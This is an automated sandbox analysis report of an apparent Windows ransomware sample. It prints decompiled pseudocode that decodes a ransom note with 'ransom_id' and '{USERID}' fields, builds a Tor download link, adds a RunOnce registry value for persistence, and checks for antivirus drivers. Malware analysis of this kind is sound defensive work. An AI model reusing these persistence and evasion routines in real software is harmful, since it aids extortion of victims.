				} while (_t87 != 0);
				do {
					 *(_t62 + 0xf152000) =  *(_t62 + 0xf152000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xf152a64 = 0xf152000;
				_t94 = E0F1481F0(0xf152000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xf152a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xf152a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000); // executed
					_t54 = E0F147D70( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xf152000;
					_t69 =  *0xf152000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xf152000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

0x0f1442c5
0x0f144598
0x0f14459d
0x0f14459d
0x0f1442cb
0x0f1442cc
0x0f1442ce
0x0f1442cf
0x0f1442d4
0x0f1442d6
0x0f1442d7
0x0f1442d9
0x0f1442da
0x0f1442dc
0x0f1442dd
0x0f1442df
0x0f1442e0
0x0f1442e5
0x0f1442e7
0x0f1442e8
0x0f1442f1
0x0f1442fd
0x0f14430e
0x0f144317
0x0f144321
0x0f144327
0x0f144330
0x0f144341
0x0f14433d
0x0f14433d
0x0f14433d
0x0f14434b
0x0f144357
0x0f144363
0x0f144369
0x0f144371
0x0f144376
0x0f14437b
0x0f14437e
0x0f144383
0x0f144390
0x0f144390
0x0f144390
0x0f144393
0x0f144398
0x0f14439c
0x0f1443a1
0x0f1443a1
0x0f1443b0
0x0f1443b0
0x0f1443b7
0x0f1443b8
0x0f1443c4
0x0f1443d8
0x0f1443dc
0x0f144456
0x0f14445d
0x0f144465
0x0f14446d
0x0f144475
0x0f14447d
0x0f144485
0x0f14448d
0x0f144495
0x0f14449d
0x0f1444a5
0x0f1444ad
0x0f1444b5
0x0f1444bd
0x0f1444c5
0x0f1444cd
0x0f1444d5
0x0f1444dd
0x0f1444e5
0x0f1444ed
0x0f1444f5
0x0f1444fd
0x0f144505
0x0f14450d
0x0f144515
0x0f14451d
0x0f144525
0x0f14452d
0x0f144535
0x0f14453d
0x0f144545
0x0f144555
0x0f14455b
0x0f144562
0x0f14456f
0x0f144575
0x0f144562
0x0f144586
0x0f144593
0x00000000
0x0f144593
0x0f1443e0
0x0f1443e0
0x0f1443e2
0x0f1443f4
0x0f1443f8
0x0f1443fd
0x0f144406
0x00000000
0x00000000
0x0f14440a
0x0f14440d
0x0f144413
0x0f144413
0x0f14441b
0x00000000
0x00000000
0x0f144420
0x0f144420
0x0f144426
0x00000000
0x00000000
0x0f144430
0x0f144432
0x0f14443d
0x0f144441
0x00000000
0x00000000
0x00000000
0x0f144441
0x0f144434
0x0f14443b
0x00000000
0x00000000
0x00000000
0x0f14443b
0x0f14459e
0x00000000
0x0f144447
0x0f144447
0x0f144447
0x0f14444b
0x0f14444e
0x0f144451
0x00000000
0x0f144413
0x00000000

APIs

Part of subcall function 0F143BC0: GetProcessHeap.KERNEL32(?,?,0F144807,00000000,?,00000000,00000000), ref: 0F143C5C

Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1474B7
Part of subcall function 0F147490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F1474C8
Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1474E6
Part of subcall function 0F147490: GetComputerNameW.KERNEL32 ref: 0F1474F0
Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F147510
Part of subcall function 0F147490: wsprintfW.USER32 ref: 0F147551
Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F14756E
Part of subcall function 0F147490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F147592
Part of subcall function 0F147490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F144810,?), ref: 0F1475B6
Part of subcall function 0F147490: RegCloseKey.KERNEL32(00000000), ref: 0F1475D2

Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472F2
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472FD
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147313
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14731E
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147334
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14733F
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147355
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(0F144B36,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147360
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147376
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147381
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147397
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473A2
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473C1
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144321
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144363
lstrcpyW.KERNEL32 ref: 0F1443E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1443E9

Strings

w, xrefs: 0F14447D
o, xrefs: 0F1444DD
ransom_id=, xrefs: 0F144350, 0F14435C
t, xrefs: 0F144465
/, xrefs: 0F1444C5
y, xrefs: 0F14451D
r, xrefs: 0F14449D
r, xrefs: 0F1444BD
r, xrefs: 0F144495
., xrefs: 0F1444B5
n, xrefs: 0F14453D
c, xrefs: 0F1444AD
-, xrefs: 0F14450D
/, xrefs: 0F144475
h, xrefs: 0F144525
m, xrefs: 0F14452D
w, xrefs: 0F1444F5
w, xrefs: 0F144485
d, xrefs: 0F1444E5
l, xrefs: 0F1444FD
h, xrefs: 0F14445D
., xrefs: 0F144535
j, xrefs: 0F1444A5
d, xrefs: 0F1444ED
t, xrefs: 0F14448D
n, xrefs: 0F1444D5
a, xrefs: 0F144505
s, xrefs: 0F14446D
{USERID}, xrefs: 0F1443BF, 0F14440D, 0F144413
o, xrefs: 0F1444CD
a, xrefs: 0F144515

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: b4bf475bc446db78834fb3dfb592b5c169322441f4d47d72684e9e394a69ba4a
Instruction ID: 7af91b1b827f6f9ab68d28e9d2a969c157749033183973130e45bf42c520036b
Opcode Fuzzy Hash: b4bf475bc446db78834fb3dfb592b5c169322441f4d47d72684e9e394a69ba4a
Instruction Fuzzy Hash: D671F270504380DBE720DF10C81976B7BE1FBC0B58F54491CFA855B292EBB9B5A8CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0F1443A6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F1443A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xf152000) =  *(_t41 + 0xf152000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xf152a64 = 0xf152000;
				_t60 = E0F1481F0(0xf152000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xf152000;
						_t49 =  *0xf152000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xf152000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xf152a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xf152a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000); // executed
				_t44 = E0F147D70( &_a136);
				return _t44;
			}

0x0f1443a6
0x0f1443b0
0x0f1443b0
0x0f1443b7
0x0f1443b8
0x0f1443c4
0x0f1443d8
0x0f1443dc
0x0f1443e0
0x0f1443e0
0x0f1443e2
0x0f1443f4
0x0f1443f8
0x0f1443fd
0x0f144406
0x00000000
0x00000000
0x0f14440a
0x0f14440d
0x0f144413
0x0f144413
0x0f14441b
0x00000000
0x0f144420
0x0f144420
0x0f144420
0x0f144426
0x00000000
0x00000000
0x0f144430
0x0f144432
0x0f14443d
0x0f144441
0x00000000
0x00000000
0x00000000
0x00000000
0x0f144434
0x0f144434
0x0f14443b
0x00000000
0x00000000
0x00000000
0x00000000
0x0f14443b
0x00000000
0x0f144432
0x0f14459e
0x00000000
0x0f14459e
0x00000000
0x0f144447
0x0f144447
0x0f144447
0x0f14444b
0x0f14444e
0x0f144451
0x00000000
0x0f144413
0x0f1443e0
0x0f144456
0x0f14445d
0x0f144465
0x0f14446d
0x0f144475
0x0f14447d
0x0f144485
0x0f14448d
0x0f144495
0x0f14449d
0x0f1444a5
0x0f1444ad
0x0f1444b5
0x0f1444bd
0x0f1444c5
0x0f1444cd
0x0f1444d5
0x0f1444dd
0x0f1444e5
0x0f1444ed
0x0f1444f5
0x0f1444fd
0x0f144505
0x0f14450d
0x0f144515
0x0f14451d
0x0f144525
0x0f14452d
0x0f144535
0x0f14453d
0x0f144545
0x0f144555
0x0f14455b
0x0f144562
0x0f14456f
0x0f144575
0x0f144562
0x0f144586
0x0f144593
0x0f14459d

APIs

lstrcpyW.KERNEL32 ref: 0F1443E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1443E9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F144555
wsprintfW.USER32 ref: 0F14456F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0F144586

Strings

w, xrefs: 0F14447D
o, xrefs: 0F1444DD
t, xrefs: 0F144465
/, xrefs: 0F1444C5
r, xrefs: 0F14449D
y, xrefs: 0F14451D
r, xrefs: 0F1444BD
r, xrefs: 0F144495
., xrefs: 0F1444B5
n, xrefs: 0F14453D
c, xrefs: 0F1444AD
-, xrefs: 0F14450D
/, xrefs: 0F144475
h, xrefs: 0F144525
m, xrefs: 0F14452D
w, xrefs: 0F1444F5
w, xrefs: 0F144485
d, xrefs: 0F1444E5
l, xrefs: 0F1444FD
h, xrefs: 0F14445D
., xrefs: 0F144535
j, xrefs: 0F1444A5
d, xrefs: 0F1444ED
t, xrefs: 0F14448D
n, xrefs: 0F1444D5
s, xrefs: 0F14446D
a, xrefs: 0F144505
{USERID}, xrefs: 0F1443BF, 0F14440D, 0F144413
o, xrefs: 0F1444CD
a, xrefs: 0F144515

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: ed4d2fc337b12ef394304a99f0c495e60676ea363b189442c3d467f059983934
Instruction ID: 6eb692c728df9f422449e190f679b6081e86359edc9bd320571ccf92c031d684
Opcode Fuzzy Hash: ed4d2fc337b12ef394304a99f0c495e60676ea363b189442c3d467f059983934
Instruction Fuzzy Hash: A6418074504380CBD720DF10D54832BBFE2FBC0B59F54491CEA984B252D7BAA5A9CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0F142960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0F142960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0F1482B0( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x0f14296b
0x0f14296d
0x0f142979
0x0f142980
0x0f142984
0x0f14298c
0x0f142993
0x0f14299a
0x0f1429a8
0x0f1429b0
0x0f1429bd
0x0f1429c7
0x0f1429ce
0x0f1429eb
0x0f1429f8
0x0f1429ff
0x0f142a06
0x0f142a0d
0x0f142a14
0x0f142a1b
0x0f142a22
0x0f142a29
0x0f142a30
0x0f142a37
0x0f142a3e
0x0f142a45
0x0f142a4c
0x0f142a53
0x0f142a5a
0x0f142a61
0x0f142a68
0x0f142a6f
0x0f142a76
0x0f142a7d
0x0f142a84
0x0f142a8c
0x0f142ac7
0x0f142a8e
0x0f142aa4
0x0f142aaf
0x0f142ab1
0x0f142ab7
0x0f142abf
0x0f142abf

APIs

lstrlenW.KERNEL32(00520050,00000041,772D82B0,00000000), ref: 0F14299D

Part of subcall function 0F1482B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1482CD
Part of subcall function 0F1482B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F1482FB
Part of subcall function 0F1482B0: GetModuleHandleA.KERNEL32(?), ref: 0F14834F
Part of subcall function 0F1482B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F14835D
Part of subcall function 0F1482B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F14836C
Part of subcall function 0F1482B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1483B5
Part of subcall function 0F1482B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1483C3

RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F142C45,00000000), ref: 0F142A84
lstrlenW.KERNEL32(00000000), ref: 0F142A8F
RegSetValueExW.KERNEL32(0F142C45,00520050,00000000,00000001,00000000,00000000), ref: 0F142AA4
RegCloseKey.KERNEL32(0F142C45), ref: 0F142AB1

Strings

n, xrefs: 0F142A45
i, xrefs: 0F142A1B
r, xrefs: 0F142A53
A, xrefs: 0F14298C
S, xrefs: 0F1429B0
\, xrefs: 0F142A30
r, xrefs: 0F1429FF
R, xrefs: 0F142A68
r, xrefs: 0F142A3E
\, xrefs: 0F142A14
I, xrefs: 0F142979
H, xrefs: 0F142993
n, xrefs: 0F142A61
P, xrefs: 0F14296D
\, xrefs: 0F1429EB
i, xrefs: 0F1429F8
d, xrefs: 0F142A22
U, xrefs: 0F142984
F, xrefs: 0F1429BD
n, xrefs: 0F142A76
u, xrefs: 0F142A37
n, xrefs: 0F142A6F
e, xrefs: 0F142A7D
w, xrefs: 0F142A29
s, xrefs: 0F142A06
R, xrefs: 0F1429CE
V, xrefs: 0F142A4C
f, xrefs: 0F142A0D
W, xrefs: 0F1429C7
i, xrefs: 0F142A5A

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 0216185ae4be2181c9bbfde112e98789b521de60d06b4b8af650ccc94b8eec54
Instruction ID: a6cea586eac24d1a694612c18f564dc7340b66448ebbe1a4bfa90be7eb7ebf4f
Opcode Fuzzy Hash: 0216185ae4be2181c9bbfde112e98789b521de60d06b4b8af650ccc94b8eec54
Instruction Fuzzy Hash: 4F31DBB094121DDFEB20CF91E948BEDBFB9FB01709F108119D5186B281D7BA59988F94

Uniqueness

Uniqueness Score: -1.00%

Function 0F142D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0F142D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0F142F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0F142C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0F142D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0F142F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0F142F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0F1430A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0F142AD0(); // executed
				goto L5;
			}

0x0f142d39
0x0f142d3a
0x0f142d3d
0x0f142d45
0x0f142d4a
0x0f142d52
0x0f142d5a
0x0f142d62
0x0f142d67
0x0f142d6f
0x0f142d77
0x0f142d7f
0x0f142d87
0x0f142d8e
0x0f142de9
0x0f142df1
0x0f142df9
0x0f142e01
0x0f142e09
0x0f142e11
0x0f142e22
0x0f142e26
0x0f142e3d
0x0f142e41
0x0f142e49
0x0f142e51
0x0f142e5f
0x0f142e68
0x0f142e6e
0x0f142e73
0x0f142e7b
0x0f142eaf
0x0f142eb4
0x0f142ebc
0x0f142ec8
0x0f142ecf
0x0f142ee3
0x0f142eeb
0x0f142eee
0x0f142eee
0x0f142f09
0x0f142f3d
0x0f142f3f
0x0f142f0b
0x0f142f17
0x0f142f1c
0x0f142f25
0x00000000
0x0f142f17
0x0f142f09
0x0f142ebf
0x0f142ebf
0x0f142e75
0x0f142e75
0x0f142d94
0x0f142d9b
0x00000000
0x00000000
0x0f142da1
0x0f142da9
0x0f142db1
0x0f142db9
0x0f142dc1
0x0f142dc9
0x0f142dd0
0x00000000
0x00000000
0x0f142dd6
0x0f142ddd
0x00000000
0x00000000
0x0f142de3
0x0f142de4
0x00000000

APIs

Part of subcall function 0F142F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F142F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F142E19
LoadCursorW.USER32(00000000,00007F00), ref: 0F142E2E
LoadIconW.USER32 ref: 0F142E59
RegisterClassExW.USER32 ref: 0F142E68
ExitThread.KERNEL32 ref: 0F142E75

Part of subcall function 0F142F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F142F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F142E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F142E81
CreateWindowExW.USER32 ref: 0F142EA7
SetWindowLongW.USER32 ref: 0F142EB4
ExitThread.KERNEL32 ref: 0F142EBF

